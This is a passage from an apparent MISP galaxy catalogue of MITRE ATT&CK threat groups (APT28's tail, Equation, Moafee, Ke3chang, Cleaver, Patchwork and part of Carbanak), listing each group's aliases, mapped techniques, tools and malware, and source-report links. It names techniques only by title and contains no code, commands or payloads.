uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="XTunnel - S0117" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Winexe - S0191" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Koadic - S0250" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Zebrocy - S0251" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Forfiles - S0193" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CORESHELL - S0137" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cannon - S0351" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="LoJax - S0397" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Downdelph - S0134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Fysbis - S0410" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Drovorub - S0502" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tor - S0183" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Wevtutil - S0645" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="X-Agent for Android - S0314" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obtain/re-use payloads - T1346" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Buy domain name - T1328" with estimative-language:likelihood-probability="almost-certain"

Table 4498. Table References
Links
https://attack.mitre.org/groups/G0007
https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
https://www.justice.gov/file/1080281/download
https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
https://www.symantec.com/blogs/election-security/apt28-espionage-military-government
https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
https://www.justice.gov/opa/page/file/1098481/download
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50[https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50]
https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/

Equation - G0020

[Equation](https://attack.mitre.org/groups/G0020) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. (Citation: Kaspersky Equation QA)

The tag is: misp-galaxy:mitre-intrusion-set="Equation - G0020"

Equation - G0020 is also known as:

Equation

View relationships graph

Equation - G0020 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Component Firmware - T1109" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Firmware - T1542.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005" with estimative-language:likelihood-probability="almost-certain"

Table 4499. Table References
Links
https://attack.mitre.org/groups/G0020
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

Moafee - G0002

[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)

The tag is: misp-galaxy:mitre-intrusion-set="Moafee - G0002"

Moafee - G0002 is also known as:

Moafee

View relationships graph

Moafee - G0002 has relationships with:

similar: misp-galaxy:threat-actor="DragonOK" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

Table 4500. Table References
Links
https://attack.mitre.org/groups/G0002
https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Ke3chang - G0004

[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted several industries, including oil, government, military, and more. (Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Ke3chang - G0004"

Ke3chang - G0004 is also known as:

Ke3chang
APT15
Mirage
Vixen Panda
GREF
Playful Dragon
RoyalAPT

View relationships graph

Ke3chang - G0004 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="MirageFox - S0280" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="spwebmember - S0227" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Okrum - S0439" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4501. Table References
Links
https://attack.mitre.org/groups/G0004
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf
https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/
https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

Cleaver - G0003

[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)

The tag is: misp-galaxy:mitre-intrusion-set="Cleaver - G0003"

Cleaver - G0003 is also known as:

Cleaver
Threat Group 2889
TG-2889

View relationships graph

Cleaver - G0003 has relationships with:

similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TinyZBot - S0004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Net Crawler - S0056" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscation or cryptography - T1313" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Build social network persona - T1341" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Develop social network persona digital footprint - T1342" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create custom payloads - T1345" with estimative-language:likelihood-probability="almost-certain"

Table 4502. Table References
Links
https://attack.mitre.org/groups/G0003
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/

Patchwork - G0040

[Patchwork](https://attack.mitre.org/groups/G0040) is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. (Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Volexity Patchwork June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Patchwork - G0040"

Patchwork - G0040 is also known as:

Patchwork
Hangover Group
Dropping Elephant
Chinastrats
MONSOON
Operation Hangover

View relationships graph

Patchwork - G0040 has relationships with:

similar: misp-galaxy:threat-actor="Dropping Elephant" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="NDiskMonitor - S0272" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Unknown Logger - S0130" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BADNEWS - S0128" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="AutoIt backdoor - S0129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TINYTYPHON - S0131" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BackConfig - S0475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1587.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4503. Table References
Links
https://attack.mitre.org/groups/G0040
https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf
http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries
https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf
https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/
https://securelist.com/the-dropping-elephant-actor/75328/
https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf
http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf

Carbanak - G0008

[Carbanak](https://attack.mitre.org/groups/G0008) is a cybercriminal group that has used [Carbanak](https://attack.mitre.org/software/S0030) malware to target financial institutions since at least 2013. [Carbanak](https://attack.mitre.org/groups/G0008) may be linked to groups tracked separately as [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN7](https://attack.mitre.org/groups/G0046) that have also used [Carbanak](https://attack.mitre.org/software/S0030) malware.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 April 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: Secureworks GOLD KINGSWOOD Threat Profile)

The tag is: misp-galaxy:mitre-intrusion-set="Carbanak - G0008"

Carbanak - G0008 is also known as:

Carbanak
Anunak

View relationships graph

Carbanak - G0008 has relationships with:

similar: misp-galaxy:threat-actor="FIN7" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Carbanak - S0030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
